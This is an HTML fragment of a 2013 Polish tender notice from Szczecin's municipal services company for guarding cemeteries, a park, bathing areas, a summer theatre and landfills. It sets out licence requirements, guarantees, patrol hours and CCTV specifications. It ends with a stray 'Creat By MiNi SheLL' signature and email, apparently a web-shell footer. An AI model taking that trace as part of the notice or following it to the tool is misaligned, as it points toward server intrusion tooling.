b) 1 osobą, posiadającą licencję pracownika zabezpieczenia technicznego pierwszego stopnia,

- dot. części II:
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej:
a) 1 osobą, posiadającą licencję pracownika ochrony fizycznej pierwszego stopnia,

- dot. części III:
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej:
a) 3 osobami posiadającymi licencje pracownika ochrony fizycznej pierwszego stopnia,

- dot. części IV:
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej:
a) 1 osobą  posiadającą licencję pracownika ochrony fizycznej pierwszego stopnia,
oraz
b) 1 osobą posiadającą licencję pracownika zabezpieczenia technicznego pierwszego stopnia,

- dot. części V:
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej:

a)  1 osobą  posiadającą licencję pracownika ochrony fizycznej pierwszego stopnia,
oraz
b) 1 osobą posiadającą licencję pracownika zabezpieczenia technicznego pierwszego stopnia,

- dot. części VI:
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej:
a) 2 osobami posiadającymi licencje pracownika ochrony fizycznej pierwszego stopnia,

- dot. części VII:
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej:
a) 3 osobami posiadającymi licencje pracownika ochrony fizycznej pierwszego stopnia,

- dot. części VIII:
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować co najmniej:
a) 2 osobami posiadającymi licencje pracownika ochrony fizycznej pierwszego stopnia,

W przypadku składania przez Wykonawcę oferty na więcej niż jedną część, Zamawiający nie dopuszcza możliwości łącznego spełniania ww. warunku, co oznacza, że Wykonawca jest zobowiązany wykazać dysponowanie osobami odrębnie dla każdej części, na którą składa ofertę (tak sama osoba nie może zostać wykazana 
w poszczególnych częściach, na które Wykonawca składa ofertę).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
       1)  ofertę cenową - zgodnie z rozdziałem I pkt 3 SIWZ;
 	W przypadku składania oferty wspólnej należy złożyć jedną ofertę cenową;
         2) 	odpowiednie pełnomocnictwa;  
	Tylko w sytuacjach określonych w rozdziale I pkt 5 zdanie drugie SIWZ lub 
	w przypadku składania oferty wspólnej (rozdział III pkt 1 SIWZ); 
       3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do SIWZ, wskazujące część 	zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli 	wykonawca przewiduje udział podwykonawców);
            W przypadku składania oferty wspólnej należy złożyć jedno oświadczenie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zuk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; pok. 17-18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.12.2013 godzina 10:00, miejsce: Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zadanie nie dotyczy umowy ramowej.
2. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Ponadto Zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami innych podmiotów stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, może żądać dokumentów dotyczących w szczególności:
1)	zakresu dostępnych Wykonawcy zasobów innego podmiotu,
2)	sposobu wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia,
3)	charakteru stosunku, jaki będzie łączył Wykonawcę z innym podmiotem,
      4)	zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia.
3. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie SPEŁNIA/NIE SPEŁNIA.
4. Przy podpisaniu umowy, Wykonawca przedłoży Zamawiającemu:
       1)	 dowód wniesienia zabezpieczenia należytego wykonania umowy:
a)	Wykonawca, zobowiązany jest wnieść zabezpieczenie należytego wykonania umowy, w wysokości 10 % maksymalnej wartości nominalnej zobowiązania Zamawiającego wynikającego z umowy,
b)	zabezpieczenie należytego wykonania umowy będzie służyło pokryciu roszczeń 
z tytułu niewykonania lub nienależytego wykonania umowy,
c)	zabezpieczenie należytego wykonania umowy może być wniesione w: pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej (z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym), gwarancjach bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości,
d)	jeżeli zabezpieczenie należytego wykonania umowy zostanie wniesione 
w pieniądzu zamawiający przechowa je na oprocentowanym rachunku bankowym,
e)	jeżeli zabezpieczenie należytego wykonania umowy zostanie wniesione 
w pieniądzu, zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane pomniejszonym 
o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy 
na rachunek wykonawcy,
f)	zabezpieczenie może być wniesione w jednej lub kilku formach.
g)	w przypadku, gdy wykonawca wnosi zabezpieczenie w formie gwarancji bankowej lub gwarancji ubezpieczeniowej, z treści tych gwarancji musi 
w szczególności jednoznacznie wynikać:
A.	zobowiązanie gwaranta (banku, zakładu ubezpieczeń) do zapłaty 
do wysokości określonej w gwarancji kwoty, nieodwołalnie 
i bezwarunkowo, na pierwsze żądanie Zamawiającego zawierające oświadczenie, że zaistniały okoliczności związane z niewykonaniem lub nienależytym wykonaniem umowy,
B.	termin obowiązywania gwarancji,
C.	miejsce i termin zwrotu gwarancji,
        2)  umowę ubezpieczenia: 
      a)	Wykonawca zobowiązany jest do posiadania umowy ubezpieczenia OC za szkody wyrządzone na mieniu lub na osobie, powstałe w związku z realizacją prac określonych w umowie, szkody powstałe z tytułu niewykonania lub nienależytego wykonania umowy - przy sumie gwarancyjnej nie mniejszej niż kwota w ofercie cenowej. Wykonawca zobowiązany jest do posiadania ochrony ubezpieczeniowej przez okres wykonywania umowy.
b)  obowiązek zawarcia ubezpieczenia będzie uważany za spełniony w przypadku,   gdy Wykonawca przekaże Zamawiającemu polisę obejmującą odpowiedzialność cywilną wraz z dowodem opłaty składki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Ochrona Cmentarza Centralnego w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 
          1)	ochronę mienia na Cmentarzu Centralnym, administrowanym przez Zamawiającego 	przed kradzieżą i dewastacją oraz ochronę osób przebywających na Cmentarzu 	Centralnym przed napadami,
     2)	kontrolę podmiotów gospodarczych świadczących usługi na terenie Cmentarza 	Centralnego poprzez:
	a)  sprawdzanie wydawanych przez Zamawiającego zezwoleń na wykonywane usługi,
	b)  kontrolę wwożonych i wywożonych elementów nagrobków,
	c) sprawdzanie zgodności miejsc wykonywanych usług z miejscami określonymi 
	     w treści zezwoleń wydanych przez Zamawiającego, 
     3) 	kontrolę ruchu wszystkich pojazdów wjeżdżających i wyjeżdżających z terenu 	Cmentarza Centralnego wg wydanych przepustek na wjazd,
     4)	zapobieganie aktom wandalizmu oraz eliminowanie kradzieży nagrobków i roślin,             	  5)	egzekwowanie przestrzegania obowiązujących przepisów porządkowych,
     6)	kontrolę wwozu i wywozu odpadów,
     7)	monitoring pomieszczeń biurowych 	administracji Cmentarza Centralnego i siedziby 	Zamawiającego,


     8)	patrolowanie terenu:
a) od godz. 6.00 do godz. 21.00 - 1 patrol 2-osobowy, tj.: od 01.04.2014 r. - 05.11.2014 r. - stały patrol rowerowy, w pozostałym okresie realizacji zadania - partol pieszy),
b) od godz. 7.00 do godz. 18.00 - 3 patrole 2-osobowe, tj.: od 01.04.2014 r. - 05.11.2014 r. - patrole rowerowe, w pozostałym okresie realizacji zadania - partole piesze),
	c)  całodobowo - 1 patrol 2-osobowy, zmotoryzowany, 
     9)   obsługę Bramy Głównej Cmentarza Centralnego:
	a)  od godz. 6.00 do godz. 22.00 - jednoosobowa obsługa od poniedziałku do piątku 	     oraz w dniu Wszystkich Świętych,
	b)  od godz. 7.00 do godz. 18.00 - jednoosobowa obsługa w soboty,
10)	wyposażenie patroli w systemy kontroli wartowników oparte na technologii GPS, 
z możliwością weryfikacji wykonanych tras w czasie przeszłym i teraźniejszym, 
w tym:
	a) pozycjonowanie patroli w czasie rzeczywistym oraz archiwalne odwzorowanie
     przebiegu tras patroli (w tym postojów, zatrzymań, prędkości, pobytu
     w zdefiniowanych miejscach, przejazdu trasą),
b)	tworzenie dowolnych raportów patroli np. dziennych, miesięcznych, weekendowych, zatrzymań, postojów, pobytów w zdefiniowanych obszarach, przejazdów alejami,
c)	zaplanowanie przebiegu tras wraz z możliwością ich późniejszej weryfikacji,
d)	nieodpłatne udostępnianie w formie elektronicznej - na każde żądanie Zamawiającego - dziennych raportów tras wykonanych przez patrole,
11)	zapewnienie mobilnych zestawów telewizji przemysłowej, czyli:
a)	 5 mobilnych kamer obejmujących zabezpieczenie wskazanych przez
      Zamawiającego miejsc na cmentarzu i 1 kamerę stałą do zamontowania na maszcie
      wskazanym przez Zamawiającego.
                  Parametry:
- kamera IP,
- zmienna ogniskowa - 3,6-9 mm obiektyw,
- dzień/noc,
- zewnętrzny doświetlacz podczerwieni IR - zasięg min 30 m (kąt min. 90 stopni),
- rozdzielczość pozwalająca czytelnie rejestrować obraz w dzień i w nocy,
       - możliwość zaprogramowania stref alarmowych z wysyłaniem alarmu w czasie
          realnym do stacji Monitoringu Operatora Kamer,
- bufor pamięci z kamery minimum 14 dni,
- obudowa zewnętrzna IP66 z autonomicznym mocowaniem,
       - wskazywanie aktualnych parametrów kamery na Stacji Monitoringu Operatora,
                     tj. sabotaż kamery, niskie napięcie, alarm wyzwolony naruszeniem strefy, próba
                     demontażu lub zmiany lokalizacji kamery,
- akumulator kamery - min. 7 dni,
- obudowa kamery kamuflowana, z grzałką,
b) stałe udostępnienie podglądu kamer, w czasie rzeczywistym, obsłudze Bramy
                 Głównej Cmentarza Centralnego,
c)	ciągłą rejestrację i transmisję z 6 kamer oraz archiwizację (do 10 dni),
d)	podłączenie zamontowanych kamer za pomocą zdalnego centrum monitorowania oraz reagowania na zauważone zdarzenia, do punktu ochrony przy Bramie Głównej Cmentarza Centralnego, wraz z dodatkowym wyposażeniem odbioru obrazu,
    12)	konserwację urządzeń monitorujących - co kwartał..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Ochrona Cmentarza Zachodniego przy ul. Bronowickiej w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje ochronę poprzez:
a)	bezpośrednią całodobową ochronę fizyczną - 1 pracownik ochrony obsługujący całodobowo system monitoringu,
b)	wsparcie przez grupę interwencyjną w przypadku zdarzeń o charakterze szczególnym typu: akty wandalizmu i niszczenia mienia, odmowa wykonania poleceń dotyczących np. opuszczenia obiektu, nieobyczajne lub agresywne zachowanie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Ochrona terenu parku miejskiego Różanka w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 
1)    ochronę poprzez:
	  a) bezpośrednią całodobową ochronę fizyczną wraz z podejmowaniem doraźnych 	       interwencji ogrodzonego terenu (2 ha) parku miejskiego Różanka, 	
     	  b)  otwieranie i zamykanie bram (rano i wieczorem),
              c)  wsparcie przez grupę interwencyjną w przypadku zdarzeń o charakterze 	           	       szczególnym typu: akty wandalizmu i niszczenia mienia, odmowa wykonania 	       poleceń dot. np. opuszczenia obiektu, nieobyczajne lub agresywne zachowanie,
      2) Wykonawca zapewni pomieszczenie socjalne wraz z niezbędną infrastrukturą dla 		 osoby dozorującej (istnieje możliwość ustawienia pomieszczenia socjalnego dla 	 	 osoby 	dozorującej, na działce Zamawiającego przylegającej bezpośrednio do terenu 		 Różanki),
      3)   Obiekt w godzinach nocnych jest zamknięty dla zwiedzających..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Ochrona kąpielisk miejskich w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 
1)  ochronę poprzez:
     a) patrole lotne (z wyłączeniem otwierania i zamykania bram kąpielisk):
	     A.  od 01.01.2014 r. do 31.03.2014 r. - 1 patrol w godzinach 21.00 - 1.00,
          B.  od 01.04.2014 r. do 14.06.2014 r. - 2 patrole, w godzinach 21.00 - 23.00 i 1.00 	           - 3.00,
	     C.  od 15.06.2014 r. do 31.08.2014 r. - 2 patrole, w godzinach 23.00 - 1.00 i 2.00 -  	           4.00,
	     D.  od 01.09.2014 r. do 31.10.2014 r. - 2 patrole, w godzinach 21.00 - 23.00 i 1.00 	           - 3.00,
          E.  od 01.11.2014 r. do 31.12.2014 r. - 1 patrol, w godzinach 21.00 - 1.00,
          - pobyt patroli lotnych będzie potwierdzany wydrukiem z systemu kontroli 		       wartowników (Dąbie - 2 punkty kontrolne, Dziewoklicz - 2 punkty kontrolne,
            Głębokie - 1 punkt kontrolny), przekazywanym raz w miesiącu Zamawiającemu,
            b) patrol pieszy w okresie od 15.06.2014 r. do 31.08.2014 r. w godzinach 13.00 - 	     17.00,
- pobyt patroli pieszych będzie potwierdzany wydrukiem z systemu kontroli
wartowników (Dąbie - 2 punkty kontrolne, Dziewoklicz - 2 punkty kontrolne, Głębokie - 1 punkt kontrolny), przekazywanym raz w miesiącu Zamawiającemu,
     c) otwieranie i zamykanie bram wejściowych kąpielisk:
	      A. otwieranie - godz. 10.00 - w soboty, niedziele i święta w okresach:
	           od 01.01.2014 r. do 14.06.2014 r. i od 01.09.2014 r. do 31.12.2014 r., 
	      B. zamykanie:
                - godz. 16.00 - w soboty, niedziele i święta w okresach:
                   od 01.01.2014 r. do 31.03.2014 r. i od 31.10.2014 r. do 31.12.2014 r.,
                -  godz. 20.00 - w soboty, niedziele i święta w okresach:
		        od 01.04.2014 r. do 14.06.2014 r. i od 01.09.2014 r. do 30.10.2014 r.,
                -  godz. 20.00 - codziennie w okresie:
		        od 01.04.2014 r. do 14.06.2014 r. i od 01.09.2014 r. do 31.10.2014 r.,
		     -  w godz. 20.00 - 20.30 - codziennie w okresie:
                   od 15.06.2014 r. do 31.08.2014 r.
     d) stały (telefoniczny i radiowy) dozór sygnałów przesyłanych, gromadzonych 
	      i przetwarzanych w systemie alarmowym oraz doraźna interwencja (w przypadku 	      odebrania sygnału o zdarzeniu, niezwłoczne skierowanie grupy interwencyjnej 
           na miejsce zdarzenia),
2)   konserwacja 3 systemów alarmowych - co kwartał, w obecności kierownika 		  kąpieliska lub osoby przez niego upoważnionej (konserwacja obejmuje wymianę 	  urządzeń i baterii typ 9V/6AM6, TL5902, 6LF22)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Ochrona Teatru Letniego i rzeźby Ptaki w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 
1)    ochronę poprzez:
  a) bezpośrednią ochronę fizyczną - z wykorzystaniem istniejącego systemu CCTV, 
z patrolowaniem minimum raz na godzinę w godzinach otwarcia obiektu oraz minimum raz na dwie godziny w czasie zamknięcia obiektu, wraz  
z podejmowaniem doraźnej interwencji:  
        A. w dni powszednie - od godz. 15.00 do godz. 7.00 dnia następnego 
              (16 h x 250 dni = 4000 h rocznie),
        B.  w dni wolne od pracy - całodobowo
              (24 h x 115 dni = 2760 h rocznie),  
       b) niezwłoczne wsparcie przez grupę interwencyjną zarówno pracownika ochrony 	        fizycznej jak i pracowników Zamawiającego, w przypadku zdarzeń o charakterze 	        szczególnym typu:
  	         A. akty wandalizmu i niszczenia mienia,
	         B. odmowa wykonania poleceń dot. np. opuszczenia obiektu, zaprzestania 		              spożywania alkoholu na terenie obiektu, nieobyczajne lub agresywne 			  zachowanie,
   	         C. łamanie zapisów regulaminu obiektu,
	         - W przypadku zaistnienia zdarzeń, o których mowa powyżej, Wykonawca 		 będzie miał obowiązek przygotować materiał z CCTV w celu zgłoszenia 		 popełnienia czynu zabronionego odpowiednim służbom, 
              c)	stosowanie systemu kontroli wewnętrznej sposobu realizacji zadań przez pracowników ochrony - koszt instalacji i utrzymania systemu ponosi Wykonawca,
	d)	pracownicy ochrony winni być wyposażeni w niezbędny sprzęt ochrony osobistej, środki przymusu bezpośredniego oraz bezprzewodowe środki łączności radiowej bądź telefonicznej, a także odpowiednio umundurowani lub ubrani w odzież służbową dostosowana do pory roku,
       e) stały (telefoniczny i radiowy) dozór sygnałów przesyłanych, gromadzonych 
	        i przetwarzanych w systemie alarmowym oraz doraźna interwencja (w przypadku 	        odebrania sygnału o zdarzeniu, niezwłoczne skierowanie grupy interwencyjnej 
             na miejsce zdarzenia),
      2)   konserwację systemu alarmowego - co kwartał, w obecności kierownika obiektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Ochrona bazy składowiska odpadów komunalnych w Sierakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje:     
 1)  ochronę poprzez:
     a) patrol pieszy wraz z otwieraniem i zamykaniem bramy:

	    A. w dni robocze - 4 patrole w godzinach: 
              2.00 - 4.00, 12.00 - 14.00, 17.00 - 19.00, 22.00 - 24.00,
	    B. w soboty, niedziele i święta - 5 patroli w godzinach:
	         2.00 - 4.00, 7.00 - 9.00, 12.00 - 14.00, 17.00 - 19.00, 22.00 - 24.00,
	     -  pobyt patroli pieszych będzie potwierdzany wydrukiem z systemu kontroli 		        wartowników (4 punkty kontrolne), przekazywanym raz w miesiącu
                    Zamawiającemu,
             b)	zapewnienie systemu łączności pomiędzy bazą Wykonawcy i osobami wykonującymi patrole - koszt systemu łączności ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Ochrona składowiska odpadów komunalnych w Sierakowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 
1)  ochronę poprzez:
	   a) bezpośrednią ochronę fizyczną -  wraz z podejmowaniem doraźnej interwencji: 
                   A. w dni robocze od poniedziałku do piątku:
		- od godz. 15.00 do godz. 7.00  - 1 osoba,
          B. w soboty, niedziele i święta :
		-  całodobowo - 1 osoba,
      2)	pracownik ochrony ma obowiązek pozostać na składowisku do momentu przybycia 	przedstawiciela Zamawiającego uprawnionego do przejęcia chronionego obiektu,
      3)	Wykonawca ma obowiązek prowadzić księgę raportów dyżurów, w której to księdze 	wpisywane będą raporty obejmujące wszystkie zdarzenia zaistniałe w trakcie dyżuru 	oraz odnotować stan chronionego obiektu przy jego przyjęciu i zdaniu,
      4)	Wykonawca ma obowiązek zapewnić na własny koszt sprawnego systemu łączności
	pomiędzy osobami wykonującymi ochronę fizyczną a ich bazą,
      5)	zakres usługi ochrony: 
	a)	ochrona składowiska przed kradzieżą, zniszczeniem, utratą, pożarem itp., 
a w szczególności dokonywanie regularnych obchodów, informowanie Zamawiającego o wszelkich nieprawidłowościach lub zdarzeniach losowych, zawiadamianie Policji i odpowiednich służb o zaistniałych zdarzeniach, podejmowanie niezbędnych  działań w razie zamachu na chroniony majątek oraz w razie pożaru - określonych w instrukcji p. poż., ochronę obiektów przed  ingerencją  osób nieupoważnionych, 
b)  ochrona majątku ruchomego i nieruchomego składowiska (kwatery nr 1, 2, 3, 4 ), w granicach ogrodzenia z siatki stalowej, terenu przyległego do wałów, 
ze szczególnym uwzględnieniem sprzętu mechanicznego, baraków wraz 
z wyposażeniem, urządzeń technologicznych na terenie składowiska, geomembrany, oświetlenia składowiska, ogrodzenia przenośnego, zbiorników wód odciekowych oraz innych urządzeń znajdujących się na składowisku,      
c)	kontrola stopnia napełniania zbiorników retencyjnych wód odciekowych, 
a w przypadku awarii systemu przepompowni wód retencyjnych i przepełnienia się zbiornika powyżej stanu alarmowego, pracownik ochrony zobowiązany jest 
do natychmiastowego powiadomienia osoby wskazanej przez Zamawiającego,
     d)	nie dopuszczenie do nieuprawnionego składowania odpadów na obiekcie 
i terenach bezpośrednio do niego przyległych, tj. ochrona przed powstawaniem tzw. dzikich wysypisk, a w przypadku dojścia do próby składowania odpadów przez osoby trzecie, pracownik ochrony ma obowiązek zapisania numeru rejestracyjnego pojazdu i innych danych służących ustaleniu sprawcy 
i natychmiastowego powiadomienia właściwych służb oraz Zamawiającego; 
w przypadku stwierdzenia przez Zamawiającego, że podczas pełnienia dyżuru 
na obiekcie składowiska doszło do nielegalnego składowania odpadów, kosztami usunięcia odpadów zostanie obciążony Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Ochrona składowiska odpadów komunalnych w Szczecinie - Kluczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje: 
1)  ochronę poprzez:
     a) patrol pieszy wraz z otwieraniem i zamykaniem bramy:
	    A. w dni robocze - 3 patrole w godzinach: 
              2.00 - 4.00, 17.00 - 19.00, 22.00 - 24.00,
	    B. w soboty, niedziele i święta - 5 patroli w godzinach:
	         2.00 - 4.00, 7.00 - 9.00, 12.00 - 14.00, 17.00 - 19.00, 22.00 - 24.00,
	     -  pobyt patroli pieszych będzie potwierdzany wydrukiem z systemu kontroli 		        wartowników, przekazywanym raz w miesiącu Zamawiającemu.
             b)	zapewnienie systemu łączności pomiędzy bazą Wykonawcy i osobami wykonującymi patrole - koszt systemu łączności ponosi Wykonawca..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com